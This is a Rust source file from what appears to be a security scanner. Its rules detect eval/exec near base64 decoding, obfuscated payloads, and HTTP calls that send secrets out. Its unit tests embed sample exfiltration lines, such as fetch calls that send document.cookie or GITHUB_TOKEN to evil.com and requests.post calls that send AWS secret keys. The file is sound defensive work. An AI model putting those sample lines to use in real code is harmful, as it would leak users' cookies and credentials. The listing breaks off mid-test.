Skip to main content

tirith_core/rules/
codefile.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::rules::shared::SENSITIVE_KEY_VARS;
5use crate::script_analysis::detect_interpreter;
6use crate::verdict::{Evidence, Finding, RuleId, Severity};
7
8/// Code file extensions eligible for scanning.
9const CODE_EXTENSIONS: &[&str] = &[
10    "js", "mjs", "cjs", "ts", "mts", "jsx", "tsx", "py", "pyw", "sh", "bash", "zsh", "fish", "ps1",
11    "psm1", "rb", "php", "pl",
12];
13
14/// Returns true if the file is a code file that should be scanned.
15pub fn is_code_file(path: Option<&str>, content: &str) -> bool {
16    if let Some(p) = path {
17        let lower = p.to_lowercase();
18        if let Some(ext) = lower.rsplit('.').next() {
19            if CODE_EXTENSIONS.contains(&ext) {
20                return true;
21            }
22        }
23    }
24    // Extensionless: require shebang
25    if content.starts_with("#!") {
26        let interp = detect_interpreter(content);
27        if !interp.is_empty() {
28            return true;
29        }
30    }
31    false
32}
33
34/// Run code file pattern scanning rules.
35pub fn check(input: &str, file_path: Option<&str>) -> Vec<Finding> {
36    let mut findings = Vec::new();
37
38    check_dynamic_code_execution(input, &mut findings);
39    check_obfuscated_payload(input, &mut findings);
40    check_suspicious_code_exfiltration(input, file_path, &mut findings);
41
42    findings
43}
44
45// ---------------------------------------------------------------------------
46// DynamicCodeExecution — eval/exec near decode/obfuscation tokens (~500 chars)
47// ---------------------------------------------------------------------------
48
49static DYNAMIC_CODE_PAIRS: Lazy<Vec<(Regex, Regex, &'static str)>> = Lazy::new(|| {
50    vec![
51        // JS: eval( near atob(
52        (
53            Regex::new(r"eval\s*\(").unwrap(),
54            Regex::new(r"atob\s*\(").unwrap(),
55            "eval() near atob()",
56        ),
57        // JS: eval( near String.fromCharCode
58        (
59            Regex::new(r"eval\s*\(").unwrap(),
60            Regex::new(r"String\.fromCharCode").unwrap(),
61            "eval() near String.fromCharCode()",
62        ),
63        // JS: new Function( near encoded content
64        (
65            Regex::new(r"new\s+Function\s*\(").unwrap(),
66            Regex::new(r"(?:atob|String\.fromCharCode|Buffer\.from)\s*\(").unwrap(),
67            "new Function() near encoded content",
68        ),
69        // Python: exec( near b64decode/base64.b64decode
70        (
71            Regex::new(r"exec\s*\(").unwrap(),
72            Regex::new(r"b(?:ase)?64[._]?b?64decode|b64decode").unwrap(),
73            "exec() near b64decode()",
74        ),
75        // Python: exec(compile(
76        (
77            Regex::new(r"exec\s*\(\s*compile\s*\(").unwrap(),
78            Regex::new(r"compile\s*\(").unwrap(),
79            "exec(compile())",
80        ),
81        // Python: exec(__import__(
82        (
83            Regex::new(r"exec\s*\(\s*__import__\s*\(").unwrap(),
84            Regex::new(r"__import__\s*\(").unwrap(),
85            "exec(__import__())",
86        ),
87    ]
88});
89
90const PROXIMITY_WINDOW: usize = 500;
91
92fn check_dynamic_code_execution(input: &str, findings: &mut Vec<Finding>) {
93    for (pattern_a, pattern_b, description) in DYNAMIC_CODE_PAIRS.iter() {
94        for mat_a in pattern_a.find_iter(input) {
95            let start = mat_a.start().saturating_sub(PROXIMITY_WINDOW);
96            let end = (mat_a.end() + PROXIMITY_WINDOW).min(input.len());
97            let window = &input[start..end];
98
99            if pattern_b.is_match(window) {
100                findings.push(Finding {
101                    rule_id: RuleId::DynamicCodeExecution,
102                    severity: Severity::Medium,
103                    title: "Dynamic code execution with obfuscation".to_string(),
104                    description: format!("Detected {description} in close proximity"),
105                    evidence: vec![Evidence::CommandPattern {
106                        pattern: description.to_string(),
107                        matched: truncate(
108                            &input[mat_a.start()..safe_end(input, mat_a.end() + 80)],
109                            120,
110                        ),
111                    }],
112                    human_view: None,
113                    agent_view: None,
114                    mitre_id: None,
115                    custom_rule_id: None,
116                });
117                return; // One finding per file is enough
118            }
119        }
120    }
121}
122
123// ---------------------------------------------------------------------------
124// ObfuscatedPayload — long base64 inside decode call near eval/exec
125// ---------------------------------------------------------------------------
126
127static OBFUSCATED_DECODE_CALL: Lazy<Regex> = Lazy::new(|| {
128    Regex::new(
129        r#"(?:atob\s*\(\s*["']|b64decode\s*\(\s*b?["']|Buffer\.from\s*\(\s*["'])([A-Za-z0-9+/=]{40,})"#,
130    )
131    .unwrap()
132});
133
134static EXEC_EVAL_NEARBY: Lazy<Regex> =
135    Lazy::new(|| Regex::new(r"(?:eval|exec|Function)\s*\(").unwrap());
136
137fn check_obfuscated_payload(input: &str, findings: &mut Vec<Finding>) {
138    for cap in OBFUSCATED_DECODE_CALL.captures_iter(input) {
139        let full_match = cap.get(0).unwrap();
140        let start = full_match.start().saturating_sub(PROXIMITY_WINDOW);
141        let end = (full_match.end() + PROXIMITY_WINDOW).min(input.len());
142        let window = &input[start..end];
143
144        if EXEC_EVAL_NEARBY.is_match(window) {
145            findings.push(Finding {
146                rule_id: RuleId::ObfuscatedPayload,
147                severity: Severity::Medium,
148                title: "Obfuscated payload with decode-execute".to_string(),
149                description:
150                    "Long base64 string decoded and executed — likely obfuscated malicious payload"
151                        .to_string(),
152                evidence: vec![Evidence::CommandPattern {
153                    pattern: "base64 decode + eval/exec".to_string(),
154                    matched: truncate(full_match.as_str(), 120),
155                }],
156                human_view: None,
157                agent_view: None,
158                mitre_id: None,
159                custom_rule_id: None,
160            });
161            return;
162        }
163    }
164}
165
166// ---------------------------------------------------------------------------
167// SuspiciousCodeExfiltration — HTTP call with sensitive data in call args
168// ---------------------------------------------------------------------------
169
170/// JS HTTP call patterns — must capture up to the opening `(`
171static JS_HTTP_CALL: Lazy<Regex> =
172    Lazy::new(|| Regex::new(r"(?:fetch\s*\(|axios\.\w+\s*\(|\.send\s*\()").unwrap());
173
174/// Python HTTP call patterns — must capture up to the opening `(`
175static PY_HTTP_CALL: Lazy<Regex> = Lazy::new(|| {
176    Regex::new(r"(?:requests\.(?:post|get|put)\s*\(|urllib\.request\.\w+\s*\()").unwrap()
177});
178
179/// Sensitive JS references: document.cookie or process.env.SENSITIVE_KEY
180static JS_SENSITIVE: Lazy<Regex> = Lazy::new(|| {
181    let keys: Vec<String> = SENSITIVE_KEY_VARS
182        .iter()
183        .map(|k| regex::escape(k))
184        .collect();
185    Regex::new(&format!(
186        r"(?:document\.cookie|process\.env\.(?:{}))",
187        keys.join("|")
188    ))
189    .unwrap()
190});
191
192/// Sensitive Python references: os.environ["SENSITIVE_KEY"] or open("/etc/passwd")
193static PY_SENSITIVE: Lazy<Regex> = Lazy::new(|| {
194    let keys: Vec<String> = SENSITIVE_KEY_VARS
195        .iter()
196        .map(|k| regex::escape(k))
197        .collect();
198    Regex::new(&format!(
199        r#"(?:os\.environ\[["'](?:{})["']\]|open\s*\(\s*["']/etc/(?:passwd|shadow)["'][^)]*\))"#,
200        keys.join("|")
201    ))
202    .unwrap()
203});
204
205/// Property keywords that indicate data/send context (fire the finding).
206static SEND_PROPS: Lazy<Regex> =
207    Lazy::new(|| Regex::new(r"(?i)(?:body|data|json|params|payload)\s*[:=]").unwrap());
208
209/// Any property-like keyword (`word:` or `word=`) — used to detect when a
210/// secret is inside an unknown property (like `meta:`) that is NOT a send context.
211static GENERIC_PROP: Lazy<Regex> = Lazy::new(|| Regex::new(r"\b\w+\s*[:=]").unwrap());
212
213/// Find the end of a call's argument list by matching the closing delimiter.
214/// `open_pos` must point to the character AFTER the opening `(`.
215/// Returns the byte position after the matching `)`, or None if unbalanced.
216///
217/// Handles: nested brackets, string literals (`"`, `'`, `` ` ``),
218/// block comments (`/* ... */`), line comments (`//`, `#`), and
219/// JS regex literals (heuristic: `/` preceded by a non-value byte).
220fn find_call_end(input: &[u8], open_pos: usize) -> Option<usize> {
221    let mut depth: u32 = 1;
222    let mut i = open_pos;
223    let mut in_string: Option<u8> = None;
224
225    while i < input.len() && depth > 0 {
226        let b = input[i];
227        match in_string {
228            Some(q) => {
229                if b == b'\\' && i + 1 < input.len() {
230                    i += 2; // skip escaped char
231                    continue;
232                }
233                if b == q {
234                    in_string = None;
235                }
236            }
237            None => {
238                // Block comment: /* ... */
239                if b == b'/' && i + 1 < input.len() && input[i + 1] == b'*' {
240                    i += 2;
241                    while i + 1 < input.len() {
242                        if input[i] == b'*' && input[i + 1] == b'/' {
243                            i += 2;
244                            break;
245                        }
246                        i += 1;
247                    }
248                    continue;
249                }
250                // Line comment: // or #
251                if (b == b'/' && i + 1 < input.len() && input[i + 1] == b'/') || b == b'#' {
252                    while i < input.len() && input[i] != b'\n' {
253                        i += 1;
254                    }
255                    continue;
256                }
257                // JS regex literal: / preceded by a non-value token
258                // Skip whitespace to find previous significant byte.
259                if b == b'/' {
260                    let prev = {
261                        let mut j = i;
262                        while j > 0 && matches!(input[j - 1], b' ' | b'\t' | b'\n' | b'\r') {
263                            j -= 1;
264                        }
265                        if j > 0 {
266                            input[j - 1]
267                        } else {
268                            0
269                        }
270                    };
271                    let is_division = prev.is_ascii_alphanumeric()
272                        || matches!(prev, b')' | b']' | b'_' | b'$' | b'+' | b'-');
273                    if !is_division {
274                        i += 1; // skip opening /
275                        while i < input.len() && input[i] != b'/' {
276                            if input[i] == b'\\' && i + 1 < input.len() {
277                                i += 1; // skip escaped char in regex
278                            }
279                            i += 1;
280                        }
281                        if i < input.len() {
282                            i += 1; // skip closing /
283                        }
284                        continue;
285                    }
286                }
287                match b {
288                    b'"' | b'\'' | b'`' => in_string = Some(b),
289                    b'(' | b'[' | b'{' => depth += 1,
290                    b')' | b']' | b'}' => depth -= 1,
291                    _ => {}
292                }
293            }
294        }
295        i += 1;
296    }
297    if depth == 0 {
298        Some(i)
299    } else {
300        None
301    }
302}
303
304fn check_suspicious_code_exfiltration(
305    input: &str,
306    file_path: Option<&str>,
307    findings: &mut Vec<Finding>,
308) {
309    let is_js = file_path
310        .map(|p| {
311            let lower = p.to_lowercase();
312            lower.ends_with(".js")
313                || lower.ends_with(".mjs")
314                || lower.ends_with(".cjs")
315                || lower.ends_with(".ts")
316                || lower.ends_with(".mts")
317                || lower.ends_with(".jsx")
318                || lower.ends_with(".tsx")
319        })
320        .unwrap_or(false);
321
322    let is_py = file_path
323        .map(|p| {
324            let lower = p.to_lowercase();
325            lower.ends_with(".py") || lower.ends_with(".pyw")
326        })
327        .unwrap_or(false);
328
329    // For extensionless shebangs, detect from content
330    let (is_js, is_py) = if !is_js && !is_py && file_path.is_some() {
331        let interp = detect_interpreter(input);
332        (
333            matches!(interp, "node" | "deno" | "bun"),
334            matches!(interp, "python" | "python3" | "python2"),
335        )
336    } else {
337        (is_js, is_py)
338    };
339
340    if is_js {
341        check_js_exfiltration(input, findings);
342    }
343    if is_py {
344        check_py_exfiltration(input, findings);
345    }
346}
347
348/// Walk bytes up to `pos` tracking strings, comments, and bracket depth.
349/// Returns `(depth, is_code)` at the target position.
350fn code_context_at(s: &[u8], pos: usize) -> (i32, bool) {
351    let mut depth: i32 = 0;
352    let mut in_string: Option<u8> = None;
353    let mut i = 0;
354
355    while i < s.len() {
356        if i == pos {
357            return (depth, in_string.is_none());
358        }
359        let b = s[i];
360        if let Some(q) = in_string {
361            if b == b'\\' && i + 1 < s.len() {
362                i += 2;
363                continue;
364            }
365            if b == q {
366                in_string = None;
367            }
368            i += 1;
369            continue;
370        }
371        // Block comment
372        if b == b'/' && i + 1 < s.len() && s[i + 1] == b'*' {
373            i += 2;
374            while i + 1 < s.len() {
375                if i == pos || i + 1 == pos {
376                    return (depth, false);
377                }
378                if s[i] == b'*' && s[i + 1] == b'/' {
379                    i += 2;
380                    break;
381                }
382                i += 1;
383            }
384            continue;
385        }
386        // Line comment
387        if (b == b'/' && i + 1 < s.len() && s[i + 1] == b'/') || b == b'#' {
388            while i < s.len() && s[i] != b'\n' {
389                if i == pos {
390                    return (depth, false);
391                }
392                i += 1;
393            }
394            continue;
395        }
396        // JS regex literal: / preceded by a non-value token
397        if b == b'/' {
398            let prev = {
399                let mut j = i;
400                while j > 0 && matches!(s[j - 1], b' ' | b'\t' | b'\n' | b'\r') {
401                    j -= 1;
402                }
403                if j > 0 {
404                    s[j - 1]
405                } else {
406                    0
407                }
408            };
409            let is_division = prev.is_ascii_alphanumeric()
410                || matches!(prev, b')' | b']' | b'_' | b'$' | b'+' | b'-');
411            if !is_division {
412                i += 1; // skip opening /
413                while i < s.len() && s[i] != b'/' {
414                    if i == pos {
415                        return (depth, false);
416                    }
417                    if s[i] == b'\\' && i + 1 < s.len() {
418                        i += 1;
419                    }
420                    i += 1;
421                }
422                if i < s.len() {
423                    if i == pos {
424                        return (depth, false);
425                    }
426                    i += 1; // skip closing /
427                }
428                continue;
429            }
430        }
431        match b {
432            b'"' | b'\'' | b'`' => in_string = Some(b),
433            b'(' | b'[' | b'{' => depth += 1,
434            b')' | b']' | b'}' => depth -= 1,
435            _ => {}
436        }
437        i += 1;
438    }
439    (depth, in_string.is_none())
440}
441
442/// Decide whether to suppress the exfil finding for a secret at `pos_in_span`
443/// within the HTTP call's argument span.
444///
445/// Logic: find the nearest shallow (depth ≤ 1), in-code property keyword
446/// (`word:` or `word=`) before the secret.
447/// - If it's a SEND keyword (body/data/json/params/payload) → fire (return false)
448/// - If it's anything else (headers, meta, unknown) → suppress (return true)
449/// - If NO property keyword at all → secret is in direct-argument / URL-concat
450///   context → fire (return false)
451fn should_suppress_exfil(arg_span: &str, pos_in_span: usize) -> bool {
452    let before = &arg_span[..pos_in_span];
453    let bytes = before.as_bytes();
454
455    // Find the nearest property-like keyword at shallow depth in actual code.
456    let nearest_prop = GENERIC_PROP
457        .find_iter(before)
458        .filter(|m| {
459            let (depth, is_code) = code_context_at(bytes, m.start());
460            depth <= 1 && is_code
461        })
462        .last();
463
464    match nearest_prop {
465        Some(m) => {
466            // If the nearest property is a recognized send keyword → fire
467            if SEND_PROPS.is_match(m.as_str()) {
468                return false;
469            }
470            // Otherwise (headers, auth, meta, token, unknown) → suppress
471            true
472        }
473        // No property keyword at all → direct argument / URL context → fire
474        None => false,
475    }
476}
477
478fn emit_exfil_finding(findings: &mut Vec<Finding>, call_snippet: &str, sens_str: &str) {
479    findings.push(Finding {
480        rule_id: RuleId::SuspiciousCodeExfiltration,
481        severity: Severity::Medium,
482        title: "Suspicious code exfiltration pattern".to_string(),
483        description: format!(
484            "HTTP call passes sensitive data '{}' as argument — potential data exfiltration",
485            sens_str
486        ),
487        evidence: vec![Evidence::CommandPattern {
488            pattern: "sensitive data inside HTTP call arguments".to_string(),
489            matched: truncate(call_snippet, 120),
490        }],
491        human_view: None,
492        agent_view: None,
493        mitre_id: None,
494        custom_rule_id: None,
495    });
496}
497
498fn check_js_exfiltration(input: &str, findings: &mut Vec<Finding>) {
499    let bytes = input.as_bytes();
500    for http_match in JS_HTTP_CALL.find_iter(input) {
501        // Match ends right after '(' — find the matching ')'
502        let call_end = match find_call_end(bytes, http_match.end()) {
503            Some(end) => end,
504            None => continue,
505        };
506        // The argument span is everything between '(' and ')'
507        let arg_span = &input[http_match.end()..call_end.saturating_sub(1)];
508
509        for sens_match in JS_SENSITIVE.find_iter(arg_span) {
510            // Only fire if the secret is in a send-position context
511            if should_suppress_exfil(arg_span, sens_match.start()) {
512                continue;
513            }
514            let snippet = &input[http_match.start()..call_end.min(input.len())];
515            emit_exfil_finding(findings, snippet, sens_match.as_str());
516            return;
517        }
518    }
519}
520
521fn check_py_exfiltration(input: &str, findings: &mut Vec<Finding>) {
522    let bytes = input.as_bytes();
523    for http_match in PY_HTTP_CALL.find_iter(input) {
524        let call_end = match find_call_end(bytes, http_match.end()) {
525            Some(end) => end,
526            None => continue,
527        };
528        let arg_span = &input[http_match.end()..call_end.saturating_sub(1)];
529
530        for sens_match in PY_SENSITIVE.find_iter(arg_span) {
531            if should_suppress_exfil(arg_span, sens_match.start()) {
532                continue;
533            }
534            let snippet = &input[http_match.start()..call_end.min(input.len())];
535            emit_exfil_finding(findings, snippet, sens_match.as_str());
536            return;
537        }
538    }
539}
540
541/// Find the largest byte index ≤ `target` that falls on a UTF-8 char boundary.
542fn safe_end(s: &str, target: usize) -> usize {
543    let clamped = target.min(s.len());
544    // Walk backwards from clamped until we hit a char boundary
545    let mut end = clamped;
546    while end > 0 && !s.is_char_boundary(end) {
547        end -= 1;
548    }
549    end
550}
551
552fn truncate(s: &str, max: usize) -> String {
553    if s.chars().count() <= max {
554        s.to_string()
555    } else {
556        let t: String = s.chars().take(max).collect();
557        format!("{t}...")
558    }
559}
560
561#[cfg(test)]
562mod tests {
563    use super::*;
564
565    #[test]
566    fn test_is_code_file_by_extension() {
567        assert!(is_code_file(Some("test.js"), ""));
568        assert!(is_code_file(Some("test.py"), ""));
569        assert!(is_code_file(Some("test.ts"), ""));
570        assert!(is_code_file(Some("test.sh"), ""));
571        assert!(is_code_file(Some("test.ps1"), ""));
572        assert!(!is_code_file(Some("notes.txt"), ""));
573        assert!(!is_code_file(Some("config.json"), ""));
574    }
575
576    #[test]
577    fn test_is_code_file_shebang() {
578        assert!(is_code_file(
579            Some("script"),
580            "#!/usr/bin/env python3\nimport os"
581        ));
582        assert!(is_code_file(Some("run"), "#!/bin/bash\necho hi"));
583        assert!(!is_code_file(Some("data"), "just some text"));
584    }
585
586    #[test]
587    fn test_dynamic_code_eval_atob() {
588        let input = r#"var x = eval(atob("SGVsbG8gV29ybGQ="));"#;
589        let findings = check(input, Some("test.js"));
590        assert!(
591            findings
592                .iter()
593                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
594            "eval+atob should fire DynamicCodeExecution"
595        );
596    }
597
598    #[test]
599    fn test_dynamic_code_exec_b64decode() {
600        let input = r#"exec(b64decode("SGVsbG8gV29ybGQ="))"#;
601        let findings = check(input, Some("test.py"));
602        assert!(
603            findings
604                .iter()
605                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
606            "exec+b64decode should fire DynamicCodeExecution"
607        );
608    }
609
610    #[test]
611    fn test_bare_eval_no_fire() {
612        let input = "eval(someVar);";
613        let findings = check(input, Some("test.js"));
614        assert!(
615            !findings
616                .iter()
617                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
618            "bare eval should not fire"
619        );
620    }
621
622    #[test]
623    fn test_eval_atob_distant_no_fire() {
624        let padding = "x".repeat(600);
625        let input = format!("eval(something);\n{padding}\natob('SGVsbG8=');");
626        let findings = check(&input, Some("test.js"));
627        assert!(
628            !findings
629                .iter()
630                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
631            "distant eval+atob should not fire"
632        );
633    }
634
635    #[test]
636    fn test_obfuscated_payload() {
637        let b64 = "A".repeat(50);
638        let input = format!(r#"eval(atob("{b64}"))"#);
639        let findings = check(&input, Some("test.js"));
640        assert!(
641            findings
642                .iter()
643                .any(|f| f.rule_id == RuleId::ObfuscatedPayload),
644            "long base64 in atob near eval should fire ObfuscatedPayload"
645        );
646    }
647
648    #[test]
649    fn test_exfil_fetch_cookie() {
650        let input = r#"fetch("https://evil.com/?d=" + document.cookie)"#;
651        let findings = check(input, Some("test.js"));
652        assert!(
653            findings
654                .iter()
655                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
656            "fetch + document.cookie should fire"
657        );
658    }
659
660    #[test]
661    fn test_exfil_fetch_env_token() {
662        let input = r#"fetch(url, {body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
663        let findings = check(input, Some("test.js"));
664        assert!(
665            findings
666                .iter()
667                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
668            "fetch + process.env.GITHUB_TOKEN in body should fire"
669        );
670    }
671
672    #[test]
673    fn test_exfil_auth_header_no_fire() {
674        let input = r#"fetch("/api/login", {headers: {"Authorization": "Bearer " + process.env.GITHUB_TOKEN}})"#;
675        let findings = check(input, Some("test.js"));
676        assert!(
677            !findings
678                .iter()
679                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
680            "Authorization header pattern should NOT fire"
681        );
682    }
683
684    #[test]
685    fn test_exfil_python_requests() {
686        let input = r#"requests.post(url, data=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
687        let findings = check(input, Some("test.py"));
688        assert!(
689            findings
690                .iter()
691                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
692            "requests.post + secret env should fire"
693        );
694    }
695
696    #[test]
697    fn test_normal_fetch_no_fire() {
698        let input = r#"fetch("/api/data").then(r => r.json())"#;
699        let findings = check(input, Some("test.js"));
700        assert!(
701            !findings
702                .iter()
703                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
704            "normal fetch should not fire"
705        );
706    }
707
708    #[test]
709    fn test_not_code_file_no_fire() {
710        let input = r#"eval(atob("SGVsbG8gV29ybGQ="));"#;
711        assert!(!is_code_file(Some("notes.txt"), input));
712    }
713
714    #[test]
715    fn test_internal_post_body_no_fire() {
716        let input = r#"requests.post("https://internal-api.example.com/log", json={"event": "login", "user": username})"#;
717        let findings = check(input, Some("test.py"));
718        assert!(
719            !findings
720                .iter()
721                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
722            "internal API POST without sensitive data should not fire"
723        );
724    }
725
726    // -----------------------------------------------------------------------
727    // Non-send properties: secret in unknown kwargs must NOT fire
728    // -----------------------------------------------------------------------
729
730    #[test]
731    fn test_exfil_js_meta_property_no_fire() {
732        let input = r#"fetch(url, {meta: process.env.GITHUB_TOKEN})"#;
733        let findings = check(input, Some("test.js"));
734        assert!(
735            !findings
736                .iter()
737                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
738            "secret in non-send property 'meta:' should NOT fire"
739        );
740    }
741
742    #[test]
743    fn test_exfil_python_meta_kwarg_no_fire() {
744        let input = r#"requests.post(url, meta=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
745        let findings = check(input, Some("test.py"));
746        assert!(
747            !findings
748                .iter()
749                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
750            "secret in non-send kwarg 'meta=' should NOT fire"
751        );
752    }
753
754    #[test]
755    fn test_exfil_js_token_property_no_fire() {
756        let input = r#"fetch(url, {token: process.env.GITHUB_TOKEN})"#;
757        let findings = check(input, Some("test.js"));
758        assert!(
759            !findings
760                .iter()
761                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
762            "secret in non-send property 'token:' should NOT fire"
763        );
764    }
765
766    #[test]
767    fn test_exfil_query_concat_fires() {
768        let input = r#"fetch("https://evil.com/c?token=" + process.env.GITHUB_TOKEN)"#;
769        let findings = check(input, Some("test.js"));
770        assert!(
771            findings
772                .iter()
773                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
774            "URL query concat with secret should fire"
775        );
776    }
777
778    // -----------------------------------------------------------------------
779    // False-positive boundary: secret must be INSIDE the HTTP call's args
780    // -----------------------------------------------------------------------
781
782    #[test]
783    fn test_exfil_separate_statement_no_fire() {
784        // Secret in a separate statement, not passed to the fetch call
785        let input = r#"fetch(url); const payload = { token: process.env.GITHUB_TOKEN };"#;
786        let findings = check(input, Some("test.js"));
787        assert!(
788            !findings
789                .iter()
790                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
791            "secret in separate statement (not in call args) should NOT fire"
792        );
793    }
794
795    #[test]
796    fn test_exfil_unrelated_body_object_no_fire() {
797        // body: keyword exists nearby but belongs to unrelated local object
798        let input = r#"fetch(url); const opts = { body: bodyVar }; const token = process.env.GITHUB_TOKEN;"#;
799        let findings = check(input, Some("test.js"));
800        assert!(
801            !findings
802                .iter()
803                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
804            "unrelated body object near fetch should NOT fire"
805        );
806    }
807
808    #[test]
809    fn test_exfil_document_cookie_not_sent_no_fire() {
810        // document.cookie is read but not passed as argument to the fetch call
811        let input = r#"fetch(url); console.log(document.cookie);"#;
812        let findings = check(input, Some("test.js"));
813        assert!(
814            !findings
815                .iter()
816                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
817            "document.cookie outside call args should NOT fire"
818        );
819    }
820
821    #[test]
822    fn test_exfil_document_cookie_inside_call_fires() {
823        // document.cookie IS passed inside the fetch call's args
824        let input = r#"fetch("https://evil.com/?c=" + document.cookie)"#;
825        let findings = check(input, Some("test.js"));
826        assert!(
827            findings
828                .iter()
829                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
830            "document.cookie inside call args should fire"
831        );
832    }
833
834    // -----------------------------------------------------------------------
835    // Parser edge cases: comments and regex literals inside call args
836    // -----------------------------------------------------------------------
837
838    #[test]
839    fn test_exfil_block_comment_in_args() {
840        // `)` inside a block comment must not terminate the arg span
841        let input =
842            r#"fetch(url /* ) */, {body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
843        let findings = check(input, Some("test.js"));
844        assert!(
845            findings
846                .iter()
847                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
848            "block comment with ) inside call args should not break parser"
849        );
850    }
851
852    #[test]
853    fn test_exfil_python_line_comment_in_args() {
854        // `#` line comment with `)` must not terminate the arg span
855        let input = "requests.post(url, # )\n    data=os.environ[\"AWS_SECRET_ACCESS_KEY\"])";
856        let findings = check(input, Some("test.py"));
857        assert!(
858            findings
859                .iter()
860                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
861            "Python # comment with ) inside call args should not break parser"
862        );
863    }
864
865    #[test]
866    fn test_exfil_js_regex_literal_in_args() {
867        // regex literal /\(/ must not throw off delimiter counting
868        let input = r#"fetch(url, {body: /\(/, json: process.env.GITHUB_TOKEN})"#;
869        let findings = check(input, Some("test.js"));
870        assert!(
871            findings
872                .iter()
873                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
874            "JS regex literal with ( should not break parser"
875        );
876    }
877
878    #[test]
879    fn test_find_call_end_block_comment() {
880        let input = b"url /* ) */, data)";
881        assert_eq!(find_call_end(input, 0), Some(18));
882    }
883
884    #[test]
885    fn test_find_call_end_line_comment() {
886        let input = b"url, # )\n    data)";
887        assert_eq!(find_call_end(input, 0), Some(18));
888    }
889
890    #[test]
891    fn test_find_call_end_regex_literal() {
892        let input = br#"url, {body: /\(/, val})"#;
893        assert_eq!(find_call_end(input, 0), Some(23));
894    }
895
896    // -----------------------------------------------------------------------
897    // Header suppression: headers before body must not suppress body secrets
898    // -----------------------------------------------------------------------
899
900    #[test]
901    fn test_exfil_headers_then_body_fires() {
902        let input = r#"fetch(url, {headers: {Authorization: auth}, body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
903        let findings = check(input, Some("test.js"));
904        assert!(
905            findings
906                .iter()
907                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
908            "secret in body after headers in same call should fire"
909        );
910    }
911
912    #[test]
913    fn test_exfil_python_headers_then_data_fires() {
914        let input =
915            r#"requests.post(url, headers=headers, data=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
916        let findings = check(input, Some("test.py"));
917        assert!(
918            findings
919                .iter()
920                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
921            "secret in data= after headers= in same call should fire"
922        );
923    }
924
925    // -----------------------------------------------------------------------
926    // Division inside call args must not truncate the span
927    // -----------------------------------------------------------------------
928
929    #[test]
930    fn test_exfil_division_in_args_fires() {
931        let input = r#"fetch(url, {body: 1 / 2, json: process.env.GITHUB_TOKEN})"#;
932        let findings = check(input, Some("test.js"));
933        assert!(
934            findings
935                .iter()
936                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
937            "division operator in call args should not break parser"
938        );
939    }
940
941    #[test]
942    fn test_exfil_paren_division_in_args_fires() {
943        let input = r#"fetch(url, {body: (a / b), json: process.env.GITHUB_TOKEN})"#;
944        let findings = check(input, Some("test.js"));
945        assert!(
946            findings
947                .iter()
948                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
949            "parenthesized division in call args should not break parser"
950        );
951    }
952
953    #[test]
954    fn test_find_call_end_division() {
955        let input = b"url, {body: 1 / 2, val})";
956        assert_eq!(find_call_end(input, 0), Some(24));
957    }
958
959    // -----------------------------------------------------------------------
960    // Nested "headers" key inside body/data/json must NOT suppress
961    // -----------------------------------------------------------------------
962
963    #[test]
964    fn test_exfil_nested_headers_in_body_fires() {
965        let input = r#"fetch(url, {body: JSON.stringify({headers: "x", token: process.env.GITHUB_TOKEN})})"#;
966        let findings = check(input, Some("test.js"));
967        assert!(
968            findings
969                .iter()
970                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
971            "nested 'headers' key inside body payload should NOT suppress"
972        );
973    }
974
975    #[test]
976    fn test_exfil_python_nested_headers_in_data_fires() {
977        let input = r#"requests.post(url, data={"headers": "x", "token": os.environ["AWS_SECRET_ACCESS_KEY"]})"#;
978        let findings = check(input, Some("test.py"));
979        assert!(
980            findings
981                .iter()
982                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
983            "nested 'headers' key inside data= dict should NOT suppress"
984        );
985    }
986
987    #[test]
988    fn test_exfil_nested_headers_in_json_fires() {
989        let input = r#"fetch(url, {json: {headers: "x", token: process.env.GITHUB_TOKEN}})"#;
990        let findings = check(input, Some("test.js"));
991        assert!(
992            findings
993                .iter()
994                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
995            "nested 'headers' key inside json property should NOT suppress"
996        );
997    }
998
999    // -----------------------------------------------------------------------
1000    // Commented-out "headers" keyword must not suppress real data exfil
1001    // -----------------------------------------------------------------------
1002
1003    #[test]
1004    fn test_exfil_python_hash_comment_headers_fires() {
1005        let input = "requests.post(url, data={# headers: fake\n'token': os.environ[\"AWS_SECRET_ACCESS_KEY\"]})";
1006        let findings = check(input, Some("test.py"));
1007        assert!(
1008            findings
1009                .iter()
1010                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1011            "# headers: inside comment must NOT suppress data= exfil"
1012        );
1013    }
1014
1015    #[test]
